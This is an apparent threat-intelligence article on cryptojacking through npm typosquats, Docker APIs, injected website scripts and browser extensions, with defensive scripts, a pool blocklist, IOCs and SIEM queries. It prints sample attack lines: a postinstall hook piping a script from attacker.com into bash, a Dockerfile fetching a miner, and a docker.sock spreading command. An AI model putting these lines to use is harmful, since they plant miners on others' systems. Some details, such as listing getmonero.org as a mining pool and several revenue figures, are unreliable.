INVADERS

Cryptojacking

Lucas Oliveira
2/3/2026
Cybersecurity Definition

Cryptojacking

Cryptojacking is the covert hijacking of computing resources to mine cryptocurrency. Attackers embed JavaScript miners in websites or drop miners via malware. Victims experience degraded performance, higher energy costs and potential hardware damage. Blocking known mining domains, enforcing script integrity and monitoring abnormal CPU usage help thwart attacks.

Cryptojacking: Silent Supply Chain Attacks | 2026

Executive Summary

Since 2024, cryptojacking—the unauthorized use of computing resources to mine cryptocurrency—has evolved into a $3.3 billion criminal enterprise targeting developers, enterprises, and cloud infrastructure through supply chain compromises. In 2025 alone, attackers compromised 3,500+ websites, infected thousands of npm packages, and silently consumed billions of CPU/GPU cycles across organizational networks worldwide.

Unlike ransomware (which triggers immediate incident response), cryptojacking remains silent and persistent—victims often don't discover compromises until performance degradation becomes severe. This economic efficiency has made cryptojacking the preferred monetization strategy for financially motivated threat actors, who generate passive income with minimal operational overhead while maintaining multi-year dwell times.

The threat landscape has fundamentally shifted: attackers now target supply chains (npm packages, Docker registries, software distributions) rather than end-users, enabling single compromises to affect millions of downstream users. State-sponsored actors have adopted cryptojacking for economic warfare, while criminal syndicates operate mining farms at industrial scale, generating $200M-$650M annually through stolen computational resources.


THE THREAT: Multi-Billion Dollar Silent Exploitation

Cryptojacking is a critical-severity persistent threat (economic impact: $3.3B+ in 2025) that weaponizes supply chain trust relationships to deploy unauthorized cryptocurrency mining operations at global scale.

How Cryptojacking Works

Cryptojacking attacks follow this operational pattern:

  1. Initial Compromise: Attackers gain access through supply chain injection (npm packages, Docker images), web application vulnerabilities (SQL injection, weak credentials), or browser-based vectors (malicious extensions, JavaScript injection)

  2. Payload Deployment: Mining software (typically XMRig for Monero) is deployed via:

    • npm package postinstall scripts (executes automatically during npm install)
    • Docker container images with embedded miners
    • JavaScript injected into website templates
    • Browser extensions with background mining processes
  3. Resource Hijacking: Mining processes consume 10-90% of victim CPU/GPU resources continuously

  4. Persistence Establishment: Malware creates:

    • Startup registry keys (Windows)
    • Systemd services (Linux)
    • Container restart policies (Docker)
    • Browser extension auto-update mechanisms
  5. Silent Operation: Mining continues indefinitely while evading detection through:

    • Process name randomization
    • Sandbox detection and evasion
    • Resource throttling (avoid 100% CPU usage)
    • Rootkit-level process hiding

Technical Example - npm Package Infection:

// Malicious postinstall script in package.json
{
  "scripts": {
    "postinstall": "node -e \"require('child_process').exec('curl -s https://attacker.com/xmrig.sh | bash')\""
  }
}

Docker Container Example:

# Malicious Dockerfile
FROM ubuntu:latest
RUN apt-get update && apt-get install -y wget
RUN wget -O /tmp/xmrig https://attacker.com/xmrig && chmod +x /tmp/xmrig
ENTRYPOINT ["/tmp/xmrig", "-o", "pool.monero:3333", "-u", "attacker_wallet"]

The threat evolved significantly throughout 2024-2025 as XMRig-based malware gained anti-forensic capabilities that reinforce supply chain persistence. Organizational detection capabilities, however, have lagged, allowing extended dwell times averaging 12+ months before discovery.


TIMELINE: From Niche Threat to Industrial-Scale Crime

Date | Event | Status
2017-2018 | CoinHive popularizes browser-based cryptojacking | ⚠️ Initial threat emergence
2024 | Supply chain targeting begins (npm, Docker) | 🔴 Escalation to enterprise
January 2024 | Year-long npm campaign begins (undetected) | 🔴 Mass exploitation
May 26, 2025 | Docker self-spreading malware campaign launches | 🔴 Active exploitation
July 2025 | 3,500+ websites compromised simultaneously | 🔴 Mass exploitation
November 2025 | npm supply chain attack discovered (12-month lag) | 📢 Public disclosure
Q4 2025 | Total cryptocurrency stolen: $3.3 billion | 📊 Impact assessment
January 2026 | XMRig malware continues active distribution | 🔍 Ongoing threat

FINANCIALLY MOTIVATED EXPLOITATION

Cryptojacking has become the primary revenue model for multiple threat actor categories due to superior economics compared to ransomware.

Economic Comparison: Cryptojacking vs. Ransomware

Metric | Ransomware | Cryptojacking
Time to Revenue | Weeks to months | Immediate (day 1)
Detection Risk | High (victim alerts) | Low (silent operation)
Revenue Duration | Single payment | Continuous (years)
Operational Risk | Very high (law enforcement) | Low (difficult attribution)
ROI per Victim | $10K-$100M (one-time) | $60-$24K/year (recurring)
Required Skills | High (encryption, negotiation) | Medium (system access + scripts)

Revenue Models by Attack Vector

Attack Vector | Revenue per Asset | Annual Income | Scale Potential
Single desktop compromise | $5-15/month | $60-180/year | Low
Enterprise server | $200-500/month | $2,400-6,000/year | Medium
GPU workstation | $500-2,000/month | $6,000-24,000/year | Medium
Large botnet (1,000 machines) | - | $2.4M-6M/year | High
Docker cluster (1,000 containers) | $50K-500K/month | - | Very High

Global Criminal Operations (2025 Estimates)

Region | Active Operations | Annual Revenue
Eastern Europe | 50+ | $50M-$150M
Russia | 30+ | $30M-$100M
China | 20+ | $20M-$80M
Americas | 40+ | $40M-$120M
Rest of World | 60+ | $60M-$200M
Total Estimate | 200+ | $200M-$650M

UNDERGROUND EXPLOIT MARKETPLACE

The "Monero Mining" Ecosystem

Cryptojacking toolkits are commoditized across underground forums and marketplaces:

Exploit/Tool | Date Advertised | Price | Market Tier
XMRig (weaponized) | Ongoing | Free (open source) | Commodity
Custom obfuscated miners | 2024-2025 | $500-$2,000 | Mid-tier
Supply chain injection kits | 2025 | $5,000-$20,000 | Premium
Docker escape + mining bundle | 2025 | $10,000-$50,000 | Premium
Browser extension template | 2024-2025 | $1,000-$5,000 | Mid-tier

Strategic Insight: The availability of free, open-source mining software (XMRig) combined with low-cost obfuscation services has dramatically lowered the barrier to entry for cryptojacking operations. This commoditization enables script kiddies to launch profitable campaigns with minimal technical expertise, while sophisticated threat actors use custom tooling for advanced supply chain persistence.


WHY THIS MATTERS: The Silent Tax on Computing

Key Challenges

  1. Detection Lag: Organizations discover cryptojacking compromises an average of 12+ months after initial infection, allowing threat actors to extract maximum value while evading incident response.

  2. Supply Chain Trust Exploitation: Developers trust npm packages, Docker images, and browser extensions implicitly. Single compromises cascade to millions of downstream users through transitive dependencies and shared infrastructure.

  3. Economic Invisibility: Unlike data breaches or ransomware, cryptojacking costs manifest as:

    • Increased cloud computing bills (often attributed to "growth")
    • Degraded application performance (blamed on "technical debt")
    • Hardware wear and premature failure (considered "normal aging")
    • Electricity cost increases (overlooked in enterprise budgets)
  4. Attribution Impossibility: Monero's privacy features make transaction tracing impossible, enabling threat actors to operate with near-total anonymity while converting stolen computational resources into untraceable cryptocurrency.


ATTACK VECTORS: Supply Chain to Browser

Vector 1: npm Package Supply Chain Compromise

Campaign: Year-long attack (2024-2025) affecting thousands of developers globally

Attack Chain

  1. Attacker researches popular npm packages and identifies typosquatting opportunities
  2. Creates malicious packages with names similar to legitimate libraries (lodash vs. 1odash)
  3. Injects payload into postinstall/preinstall scripts (executes automatically during installation)
  4. Developers unknowingly install compromised packages via npm install
  5. Malware executes with developer privileges during installation
  6. Establishes persistence in development environments and CI/CD pipelines
  7. Mines cryptocurrency using victim's CPU while stealing source code and credentials

Payload Characteristics

  • Dual-functionality: Cryptomining (XMRig) + credential theft (infostealer)
  • Obfuscation: Multi-layer code obfuscation defeats static analysis tools
  • Persistence: Modifies package.json, creates background services, installs system-level hooks
  • Evasion: Detects sandboxes (npm audit environments), disables security tools, removes installation traces

Detection Challenge

Organizations struggle to detect npm-based cryptojacking because:

  • Legitimate packages contain thousands of transitive dependencies
  • Dependencies-of-dependencies lack visibility in security scanning
  • Code obfuscation defeats automated static analysis
  • Manual code review is impractical at scale (100+ dependencies per project)
  • Supply chain attacks exploit implicit trust in open-source ecosystems
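The install-hook and typosquatting checks above can be automated before a hook ever runs. The following is an added example (not code from the article): it audits a package.json for install-lifecycle scripts that pipe remote content into a shell, spawn child processes or decode-and-eval payloads, and compares the package name against a list of popular packages after normalising look-alike characters. The manifests, the popular-package list and the attacker.example host are constructed.

```python
"""Audit an npm package.json for risky install-lifecycle scripts and typosquatted
names. Added example, not code from the article; manifests and the popular-package
list below are constructed samples."""
import json
import re

# Lifecycle hooks npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Patterns that are rarely legitimate in an install hook.
RISKY_PATTERNS = {
    "remote_pipe_to_shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "child_process": re.compile(r"child_process|\bspawn\(|\bexec\("),
    "decode_and_eval": re.compile(r"(base64|atob|fromCharCode).*(eval\(|Function\()", re.S),
    "miner_name": re.compile(r"xmrig|minerd|cryptonight|stratum", re.I),
}

# Constructed allowlist of widely used package names to compare against.
POPULAR = ("lodash", "express", "react", "axios", "chalk", "commander")
# Look-alike characters attackers substitute; normalised away before comparing.
HOMOGLYPHS = str.maketrans({"1": "l", "0": "o", "5": "s", "3": "e", "-": "", "_": ""})


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two names; 1 means a single typo away."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidate(name: str):
    """Return the popular package this name imitates, or None for an exact or unrelated name."""
    if name in POPULAR:
        return None
    norm = name.lower().translate(HOMOGLYPHS)
    for pop in POPULAR:
        if norm == pop or levenshtein(norm, pop) <= 1:
            return pop
    return None


def audit_manifest(manifest_json: str) -> dict:
    """Flag risky install hooks and typosquatting for one package.json document."""
    pkg = json.loads(manifest_json)
    name = pkg.get("name", "")
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = pkg.get("scripts", {}).get(hook, "")
        for pattern_id, rx in RISKY_PATTERNS.items():
            if rx.search(cmd):
                findings.append((hook, pattern_id))
    return {"name": name, "typosquat": typosquat_candidate(name), "findings": findings}


# Constructed samples: one mirroring the postinstall pattern shown earlier, one benign.
MALICIOUS = json.dumps({
    "name": "1odash", "version": "4.17.21",
    "scripts": {"postinstall": "node -e \"require('child_process').exec("
                               "'curl -s https://attacker.example/xmrig.sh | bash')\""},
})
BENIGN = json.dumps({
    "name": "express", "version": "4.19.2",
    "scripts": {"test": "mocha", "postinstall": "node scripts/build-native.js"},
})

if __name__ == "__main__":
    for manifest in (MALICIOUS, BENIGN):
        print(audit_manifest(manifest))
```

Run it over every package.json under node_modules after an `npm install --ignore-scripts`, so flagged hooks are reviewed before any of them executes.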

Impact Assessment

  • Dozens of organizations with persistent development environment infections
  • Access to intellectual property: Source code, internal APIs, credentials
  • Supply chain cascade: Malware injected into products built by compromised developers
  • Extended dwell time: 12+ months average before detection

Vector 2: Docker Container Cryptojacking

Campaign: Self-spreading malware targeting misconfigured Docker environments (May-June 2025)

Attack Method

  1. Attacker scans internet for exposed Docker APIs (ports 2375, 2376 without authentication)
  2. Gains API access to Docker daemon (equivalent to root access)
  3. Uploads malicious container image to victim's registry
  4. Compromises legitimate containers via shared Docker socket (/var/run/docker.sock)
  5. Container-to-container lateral movement (infects sibling containers)
  6. Spawns mining processes consuming 70-90% CPU per container
  7. Persistence via the Docker restart policy (restart: always)

Targeting Profile

  • Cloud environments (AWS ECS, Azure Container Instances, Google Cloud Run)
  • Kubernetes clusters with weak RBAC (Role-Based Access Control)
  • Development teams with misconfigured Docker daemon (-H tcp://0.0.0.0:2375)
  • On-premise Docker deployments with default configurations

Propagation Mechanism

The malware achieves self-spreading through:

# Malicious container infects siblings via Docker socket
docker run -v /var/run/docker.sock:/var/run/docker.sock \
  attacker/cryptominer:latest \
  --spread --mine --wallet=attacker_address

Financial Impact per Organization

Deployment Size | Monthly Cost (Stolen Resources)
Small (10 containers) | $500-$2,000
Medium (100 containers) | $5,000-$20,000
Large (1,000+ containers) | $50,000-$500,000
Total Enterprise Impact (2025) | Estimated $300M+

Vector 3: Website JavaScript Injection

Campaign: 3,500+ websites compromised simultaneously (July 2025)

Attack Chain

  1. Attacker gains web server access via:

    • SQL injection vulnerabilities
    • Weak administrator credentials
    • CMS vulnerabilities (WordPress, Drupal, Joomla)
    • Supply chain compromise (themes, plugins)
  2. Injects JavaScript mining code into:

    • Page templates (header/footer)
    • Database-stored content
    • Content Management System (CMS) core files
    • Third-party widgets/plugins
  3. JavaScript automatically served to every visitor accessing website

  4. Browser executes miner in background while user browses site

  5. Silent mining continues for each unique visitor until page is closed

Deployment Platforms

  • CoinImp (CoinHive successor, discontinued 2021 but forks exist)
  • Custom JavaScript miners (attacker-developed)
  • WebAssembly miners (faster execution, harder to detect, more efficient)

User Impact

Performance degradation experienced by website visitors:

  • 10-40% CPU usage (noticeable system slowdown, laptop fan noise)
  • Battery drain: Mobile devices experience 30-50% faster depletion
  • Increased latency: Page interactions lag noticeably
  • Device overheating: Thermal throttling on laptops/phones

Attacker Revenue Model

Revenue calculation for 3,500 compromised websites:
- 3,500 websites × 10,000 daily visitors = 35M visitor-days/month
- Average mining value: $0.005 per visitor-day
- Monthly revenue: $0.005 × 35M = $175,000/month
- Annual revenue: $2.1M/year from JavaScript injection alone

Detection Challenge

Website owners struggle to detect JavaScript miners because:

  • JavaScript minification/obfuscation hides mining code
  • WebAssembly bytecode is difficult to analyze statically
  • Legitimate JavaScript frameworks sometimes trigger similar CPU behavior
  • Users attribute slowness to "old computer" rather than reporting to website owner

Detection example (DevTools Console):

// Detecting mining scripts in browser console
for (let script of document.scripts) {
  if (script.src.match(/coinhive|coinimp|cryptonight|webassembly/i)) {
    console.warn('Mining script detected:', script.src);
  }
}

Vector 4: Browser Extension Cryptojacking

Overview: Malicious extensions distributed via official Chrome Web Store, Firefox Add-ons

Attack Method

  1. Attacker creates seemingly legitimate extension:

    • Productivity tool (note-taking, task management)
    • VPN client (privacy/security marketing)
    • Ad blocker (ironically positioned as "security" tool)
  2. Hides cryptomining code in extension background script

  3. Injects miner into all web pages visited by user

  4. Updates extension regularly via auto-update mechanism to:

    • Maintain persistence after browser restarts
    • Evade detection by changing code signatures
    • Add new capabilities (credential theft, form interception)
  5. Extracts browser data (history, cookies, passwords) as secondary payload

Distribution Channels

  • Chrome Web Store (official, appears legitimate)
  • Firefox Add-ons (Mozilla's official marketplace)
  • Microsoft Edge Add-ons
  • Third-party extension marketplaces

User Base & Social Engineering

  • 1,000+ installations per compromised extension (appears popular)
  • Fabricated positive reviews (5-star ratings, fake testimonials)
  • Feature misrepresentation: Advertises useful functionality while hiding mining

Capabilities

Capability | Impact
Cryptomining | 10-30% CPU utilization
Browser history theft | Privacy violation, reconnaissance
Cookie/credential harvesting | Session hijacking, account takeover
Form data interception | Payment card theft, PII exfiltration
Web page modification | Inject ads, tracking scripts, phishing

Persistence Mechanisms

  • Auto-update: Malware stays installed across browser restarts
  • Hijacked uninstall: Difficult to remove (intercepts uninstall process)
  • Self-replication: Recreates itself if deleted from chrome://extensions

DEFENSIVE POSTURE: Immediate Actions

🔴 Patch & Update (Critical Priority)

  • Update all software immediately: Ensure npm packages, Docker images, CMS platforms, and browsers are at latest versions
  • Audit dependencies: Run npm audit, yarn audit, or equivalent for all projects
  • Rebuild container images: Scan and rebuild Docker images from trusted base images
  • Remove suspicious packages: Uninstall any npm packages installed from untrusted sources
  • Browser cleanup: Remove all extensions not explicitly required; audit remaining extensions quarterly

👥 Developer & User Awareness

  • npm security training: Educate developers on typosquatting risks and dependency verification
  • Extension policy: Prohibit installation of browser extensions from non-approved sources
  • Performance awareness: Train users to report unusual CPU usage, battery drain, or system slowdown
  • Supply chain verification: Require cryptographic verification of package sources before installation

🔍 Detection & Response

System-Level Monitoring

Hunt for suspicious processes:

# Windows (PowerShell): detect and stop mining processes
# ProcessName has no .exe suffix, so match 'mm' rather than 'mm.exe'
Get-Process | Where-Object {$_.ProcessName -match 'xmrig|minerd|cryptod|^mm$'} | Stop-Process -Force

# Check for high CPU usage processes
Get-Process | Sort-Object CPU -Descending | Select-Object -First 10

# Linux: detect and kill mining processes
# pgrep -f matches the full command line and, unlike ps | grep, never matches itself
pgrep -af 'xmrig|minerd|cryptod'
pgrep -f 'xmrig|minerd|cryptod' | xargs -r kill -9

# Monitor CPU usage
top -b -n 1 | head -n 20

Network-Level Detection

Block mining pool domains at firewall:

# Mining pool blocklist (DNS/firewall rules)
supportxmr.com
minexmr.com
nanopool.org
pool.monero
hashvault.pro
moneroocean.stream
getmonero.org

Monitor outbound connections:

# Linux: check for established connections owned by miner-named processes
# (-l would list only listening sockets; stratum mining traffic is TCP)
netstat -tnp | grep ESTABLISHED | grep -E 'xmrig|minerd|cryptod'

# Windows: Monitor network connections
Get-NetTCPConnection | Where-Object {$_.State -eq "Established"} | Select-Object LocalAddress,RemoteAddress,RemotePort,OwningProcess
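The network indicators this article lists (pool domains, ports 3333/7777/14444, miner process names) applied to ss -tnp socket listings, as an added example that is not code from the article: the socket lines and the IP-to-name cache (the kind of mapping a DNS log provides) are constructed, and include a renamed process talking to a pool over port 443 that only the DNS mapping reveals.

```python
"""Apply the network indicators above (pool domains, ports 3333/7777/14444, miner
process names) to `ss -tnp` socket listings. Added example, not code from the
article; the socket lines and the IP-to-name cache below are constructed."""
import re

POOL_DOMAINS = {"supportxmr.com", "minexmr.com", "nanopool.org",
                "hashvault.pro", "moneroocean.stream"}
POOL_PORTS = {3333, 7777, 14444}
MINER_PROCESS = re.compile(r"^(xmrig|minerd|cryptod|mm)$", re.I)

# One `ss -tnp` row, e.g.:
# ESTAB 0 0 10.0.0.5:49812 203.0.113.10:3333 users:(("xmrig",pid=4242,fd=9))
SS_ROW = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<raddr>\S+):(?P<rport>\d+)"
    r'(?:\s+users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+))?'
)


def parse_ss_row(line: str):
    """Return a dict for one socket row, or None for the header or unparsable lines."""
    m = SS_ROW.match(line.strip())
    if not m:
        return None
    row = m.groupdict()
    row["rport"] = int(row["rport"])
    row["pid"] = int(row["pid"]) if row["pid"] else None
    return row


def is_pool_domain(name) -> bool:
    """True for a blocklisted pool domain or any of its subdomains."""
    return bool(name) and any(name == d or name.endswith("." + d) for d in POOL_DOMAINS)


def classify(row: dict, dns_cache: dict) -> list:
    """Reasons a connection looks like mining traffic; empty list if none apply.
    dns_cache maps peer IP -> the name it was resolved from (from DNS logs), which
    exposes a renamed miner talking to a pool over an innocuous port such as 443."""
    if row["state"] != "ESTAB":
        return []
    reasons = []
    name = dns_cache.get(row["raddr"])
    if is_pool_domain(name):
        reasons.append(f"pool_domain:{name}")
    if row["rport"] in POOL_PORTS:
        reasons.append(f"pool_port:{row['rport']}")
    if row["proc"] and MINER_PROCESS.match(row["proc"]):
        reasons.append(f"miner_process:{row['proc']}")
    return reasons


def hunt(ss_output: str, dns_cache: dict) -> list:
    """Return (pid, process, peer_ip, peer_port, reasons) for every flagged connection."""
    hits = []
    for line in ss_output.splitlines():
        row = parse_ss_row(line)
        if row is None:
            continue
        reasons = classify(row, dns_cache)
        if reasons:
            hits.append((row["pid"], row["proc"], row["raddr"], row["rport"], reasons))
    return hits


# Constructed `ss -tnp` output and a constructed DNS-log cache (RFC 5737 test addresses).
SS_OUTPUT = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0      0      10.0.0.5:49812    203.0.113.10:3333 users:(("xmrig",pid=4242,fd=9))
ESTAB 0      0      10.0.0.5:50120    198.51.100.7:443  users:(("node",pid=5150,fd=21))
ESTAB 0      0      10.0.0.5:50431    203.0.113.44:443  users:(("kworker",pid=6011,fd=3))
"""
DNS_CACHE = {"203.0.113.10": "pool.minexmr.com",
             "198.51.100.7": "registry.npmjs.org",
             "203.0.113.44": "gulf.moneroocean.stream"}

if __name__ == "__main__":
    for hit in hunt(SS_OUTPUT, DNS_CACHE):
        print(hit)
```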

Container Security

Scan Docker images for cryptominers:

# Trivy scan for HIGH/CRITICAL vulnerabilities in an image
trivy image --severity HIGH,CRITICAL your-image:tag

# Inspect running containers for suspicious CPU usage and processes
# (live CPU/memory columns come from docker stats; docker ps has no {{.CPU}} field)
docker stats --no-stream --format "table {{.ID}}\t{{.Name}}\t{{.CPUPerc}}\t{{.MemUsage}}"
docker top <container_id>
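Beyond docker top, the traits of the self-spreading container from Vector 2 (a docker.sock bind mount, restart: always, an image from no trusted registry, a miner command line pointing at a pool port) can be checked directly from docker inspect output. This is an added example, not code from the article or from any tool it names; the inspect records, the registry.internal.example trusted-registry prefix and the image names are constructed.

```python
"""Triage `docker inspect` records for the container traits described above:
Docker-socket mounts, restart: always persistence, privileged mode, images from
unknown registries and miner-like command lines. Added example, not code from the
article; the inspect records and registry prefix below are constructed."""
import json
import re

# Assumed internal registry prefix; anything else counts as untrusted.
TRUSTED_REGISTRIES = ("registry.internal.example/",)
MINER_RX = re.compile(r"xmrig|minerd|cryptod|cryptonight|stratum\+tcp", re.I)
POOL_PORT_RX = re.compile(r":(3333|7777|14444)\b")   # ports listed in the IOC section
# Findings that alone justify isolating the container; the rest are context.
HIGH = {"miner_cmdline", "pool_port_in_cmdline"}


def audit_container(spec: dict) -> list:
    """Return the list of finding ids for one docker inspect record."""
    host = spec.get("HostConfig") or {}
    cfg = spec.get("Config") or {}
    findings = []
    # docker.sock can arrive as a -v bind string or as a Mounts[] entry.
    sources = [b.split(":")[0] for b in host.get("Binds") or []]
    sources += [m.get("Source", "") for m in spec.get("Mounts") or []]
    if any(s.endswith("docker.sock") for s in sources):
        findings.append("docker_socket_mounted")
    if (host.get("RestartPolicy") or {}).get("Name") == "always":
        findings.append("restart_always")
    if host.get("Privileged"):
        findings.append("privileged")
    if not (cfg.get("Image") or "").startswith(TRUSTED_REGISTRIES):
        findings.append("untrusted_image")
    cmdline = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
    if MINER_RX.search(cmdline):
        findings.append("miner_cmdline")
    if POOL_PORT_RX.search(cmdline):
        findings.append("pool_port_in_cmdline")
    return findings


def triage(inspect_json: str) -> dict:
    """Map container name -> (severity, findings) for every record in `docker inspect` output."""
    result = {}
    for spec in json.loads(inspect_json):
        name = (spec.get("Name") or "?").lstrip("/")
        findings = audit_container(spec)
        if HIGH & set(findings):
            severity = "high"
        elif "docker_socket_mounted" in findings and "untrusted_image" in findings:
            severity = "high"      # socket access from an unknown image: lateral movement risk
        elif findings:
            severity = "review"
        else:
            severity = "clean"
        result[name] = (severity, findings)
    return result


# Constructed records shaped like `docker inspect` output (only the fields used here).
INSPECT_OUTPUT = json.dumps([
    {"Name": "/worker-7f2a",
     "Config": {"Image": "attacker/cryptominer:latest",
                "Entrypoint": ["/tmp/xmrig", "-o", "pool.monero:3333", "-u", "attacker_wallet"],
                "Cmd": ["--spread", "--mine"]},
     "HostConfig": {"Binds": ["/var/run/docker.sock:/var/run/docker.sock"],
                    "RestartPolicy": {"Name": "always"}, "Privileged": False},
     "Mounts": []},
    {"Name": "/web",
     "Config": {"Image": "registry.internal.example/web:1.4",
                "Entrypoint": ["nginx", "-g", "daemon off;"], "Cmd": None},
     "HostConfig": {"Binds": ["/srv/web:/usr/share/nginx/html:ro"],
                    "RestartPolicy": {"Name": "unless-stopped"}, "Privileged": False},
     "Mounts": [{"Source": "/srv/web", "Destination": "/usr/share/nginx/html"}]},
])

if __name__ == "__main__":
    for name, (severity, findings) in triage(INSPECT_OUTPUT).items():
        print(f"{severity:6} {name}: {findings}")
```

Feed it the output of docker inspect over every running container id; the socket-mount and restart-policy checks correspond to the traits of the propagation command in Vector 2.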

Web Application Security

Detect JavaScript miners in websites:

# Scan website for mining scripts
curl -s https://your-website.com | grep -iE 'coinhive|coinimp|cryptonight|webassembly'

# Check browser DevTools Console for mining activity
# Manually inspect: DevTools → Network tab → filter for WebSocket connections to pool domains

Detection Queries (SIEM)

Splunk detection query:

index=security sourcetype=process
| search process_name IN ("xmrig", "minerd", "cryptod", "mm.exe")
| stats count by host, user, process_name, process_path
| where count > 0

Microsoft Sentinel (KQL) detection query:

SecurityEvent
| where EventID == 4688
| where NewProcessName has_any ("xmrig", "minerd", "cryptod")
| summarize count() by Computer, Account, NewProcessName, CommandLine
| where count_ > 0

📧 Email & Network Security

  • Block mining pool domains: Implement DNS filtering to prevent connections to known mining pools
  • Sandbox attachments: Quarantine emails with attachments for automated analysis
  • Outbound traffic inspection: Monitor for sustained connections to non-business IP addresses
  • TLS inspection: Decrypt and inspect HTTPS traffic for mining pool C2 communication

🛡️ Long-Term Defense Strategy

CPU/GPU Usage Baselines

  • Establish normal resource consumption baselines for all systems
  • Alert on sustained anomalies (>30% deviation from baseline for >5 minutes)
  • Implement predictive alerting using machine learning models
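One way to implement the sustained-deviation rule above (>30% above baseline for >5 minutes), as an added example that is not part of the original article: the baseline is the median of historical one-minute readings, and an alert fires only for runs longer than five minutes, so short build or backup spikes are ignored while a throttled miner sitting well below 100% is still caught. The CPU readings are constructed.

```python
"""Sustained-CPU-deviation detector implementing the baseline rule above
(>30% deviation from baseline for >5 minutes). Added example, not code from the
article; the one-minute CPU readings below are constructed."""
from statistics import median

DEVIATION = 0.30        # relative deviation from baseline that counts as anomalous
MIN_MINUTES = 5         # a run must last longer than this before alerting
SAMPLE_INTERVAL = 1     # minutes between readings (assumed)


def baseline_from(history):
    """Median of historical readings: robust to the occasional legitimate spike."""
    return median(history)


def detect_sustained(samples, baseline):
    """Return (start_index, end_index, mean_cpu) for each run of readings that stays
    above baseline * (1 + DEVIATION) for longer than MIN_MINUTES.
    Short spikes (a build, a backup) end before the threshold and are ignored; a
    throttled miner sitting well below 100% is still caught because the rule is
    relative to the host's own baseline."""
    threshold = baseline * (1 + DEVIATION)
    alerts, run_start = [], None
    for i, cpu in enumerate(samples + [None]):      # None sentinel closes a trailing run
        if cpu is not None and cpu > threshold:
            if run_start is None:
                run_start = i
            continue
        if run_start is not None:
            if (i - run_start) * SAMPLE_INTERVAL > MIN_MINUTES:
                segment = samples[run_start:i]
                alerts.append((run_start, i - 1, round(sum(segment) / len(segment), 1)))
            run_start = None
    return alerts


# Constructed training window (readings of a quiet host, one legitimate spike).
TRAINING = [12, 14, 11, 13, 15, 12, 40, 13, 12, 14]
# Constructed live readings: a 3-minute build spike, then a throttled miner at ~62%.
LIVE = [12, 13] + [80, 85, 78] + [12, 14] + [62] * 20 + [12, 13]

if __name__ == "__main__":
    base = baseline_from(TRAINING)
    for start, end, mean_cpu in detect_sustained(LIVE, base):
        print(f"ALERT: minutes {start}-{end} averaged {mean_cpu}% CPU "
              f"(baseline {base}%, threshold {base * (1 + DEVIATION):.1f}%)")
```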

Supply Chain Security

  • SBOM (Software Bill of Materials): Maintain complete inventory of all dependencies
  • Cryptographic verification: Verify package signatures before installation
  • Dependency pinning: Prevent auto-update of potentially malicious versions
  • Internal package mirror: Intercept and scan packages before developer access

Container Security Best Practices

  • Image signing + verification: Require signed images from trusted registries
  • Private registry: Maintain internal registry with security scanning
  • Network policies: Implement egress restrictions preventing connections to mining pools
  • Runtime behavior monitoring: Use Falco or Wazuh to detect process spawning anomalies

Browser Protection

  • Extension allowlist: Permit only approved extensions from vetted sources
  • Browser policies: Disable extension installation for non-administrator users
  • Permission monitoring: Alert when extensions request new permissions
  • Quarterly audit: Review all installed extensions for legitimacy

Web Application Security

  • Penetration testing: Conduct quarterly assessments for injection vulnerabilities
  • Input validation: Implement strict input validation to prevent SQL/command injection
  • WAF deployment: Deploy Web Application Firewall with rules for malicious script injection
  • Security scanning: Implement SAST/DAST in CI/CD pipeline

INDICATORS OF COMPROMISE (IOCs)

File Hashes (SHA-256)

XMRig variants (sample hashes):

Malicious npm packages (example):
ethereum-devtools-plugin (package hash varies by version)
bitcoinjs-utils-dev (compromised package)

Network Indicators

Mining Pool Domains:
- supportxmr.com
- minexmr.com
- nanopool.org
- pool.monero
- hashvault.pro
- moneroocean.stream

Command & Control IPs:
- 192.0.2.1 (example - Replace with actual threat intel)
- 198.51.100.1 (example - Replace with actual threat intel)

Suspicious Ports:
- TCP 3333 (common mining pool port)
- TCP 7777 (alternative mining pool port)
- TCP 14444 (Monero P2P)

File Paths

Windows:
- C:\Users\[USERNAME]\AppData\Roaming\xmrig.exe
- C:\Windows\Temp\minerd.exe
- C:\ProgramData\CryptoService\mm.exe

Linux:
- /tmp/.xmrig
- /usr/local/bin/cryptod
- /var/tmp/.mining
- /home/[USER]/.config/autostart/miner.desktop

Docker:
- /tmp/miner
- /usr/bin/xmrig
- /opt/mining/

Registry Keys (Windows)

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\CryptoService
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SystemUpdate
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MiningService

MITRE ATT&CK MAPPING

Tactic | Technique | ID | Description
Initial Access | Supply Chain Compromise | T1195.002 | Compromise software dependencies (npm, Docker)
Execution | Command and Scripting Interpreter | T1059 | Execute mining software via npm scripts, bash
Persistence | Boot or Logon Autostart Execution | T1547 | Registry keys, systemd services, Docker restart policies
Privilege Escalation | Container Escape | T1611 | Docker socket exploitation for host access
Defense Evasion | Obfuscated Files or Information | T1027 | Code obfuscation, process name randomization
Defense Evasion | Virtualization/Sandbox Evasion | T1497 | Detect analysis environments, cease malicious activity
Resource Development | Acquire Infrastructure | T1583.006 | Register mining pool accounts, cryptocurrency wallets
Impact | Resource Hijacking | T1496 | Cryptomining using victim computational resources

BOTTOM LINE

Cryptojacking represents a permanent, scalable monetization model for cybercriminals that is highly profitable, difficult to detect, and nearly impossible to prosecute.

Key Takeaways

Supply chain targeting is the new normal - Single npm package or Docker image compromises affect millions of downstream users through transitive dependencies and shared infrastructure

Detection lag enables maximum value extraction - 12+ month average dwell time allows threat actors to generate $2.4K-$24K per victim annually with minimal operational overhead

Monero's privacy features provide perfect attribution evasion - Untraceable transactions and fungibility make cryptojacking prosecution nearly impossible, incentivizing continued operations

